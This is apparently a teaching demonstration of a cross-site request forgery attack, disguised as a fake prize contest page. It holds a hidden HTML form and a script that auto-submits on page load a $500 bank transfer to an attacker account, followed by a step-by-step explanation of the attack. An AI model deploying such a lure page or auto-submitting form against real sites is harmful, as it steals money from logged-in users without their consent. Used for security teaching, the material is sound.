🎉 MEGA SOCIAL CONTEST 2024

Win $10,000 Cash Prize + iPhone 15 Pro + MacBook Pro!

🔥 Only 50 Winners! Enter NOW!

⚠️ CSRF Attack Warning: This page contains hidden forms that will submit malicious requests!
If you're logged into the banking site, a $500 transfer may be executed.

🎯 POST-based CSRF Attack Status

Attack Type: Hidden Form Auto-Submit

Target Amount: $500

Method: POST request with form data

Status: Preparing attack...

📝 Enter the Contest (Fake Form)

Fill out this form to enter our amazing contest! (This is just a distraction)

🚨 Hidden CSRF Attack Forms

These forms are invisible and will auto-submit to perform CSRF attacks:

<!-- Hidden CSRF form that auto-submits --> <form action="http://bank.com/transfer" method="POST" style="display:none;"> <input type="hidden" name="to" value="attacker_account"> <input type="hidden" name="amount" value="500"> <input type="submit"> </form> <script> // Auto-submit the form when page loads document.forms[0].submit(); </script>

🔍 How POST-based CSRF Works:

  1. User visits malicious page (this contest page)
  2. Hidden forms are automatically submitted via JavaScript
  3. POST request sent to banking site with malicious data
  4. Browser includes cookies automatically with the request
  5. Banking server processes the POST as legitimate
  6. Action executed without user consent (money transfer)

⚔️ Attack Variations:

🛡️ Why This Attack Works:

Processing your contest entry...

Educational Note: This demonstrates how attractive websites can hide malicious forms

Always verify that contest/prize websites are legitimate before entering personal information!

Check your banking application to see if the CSRF attack succeeded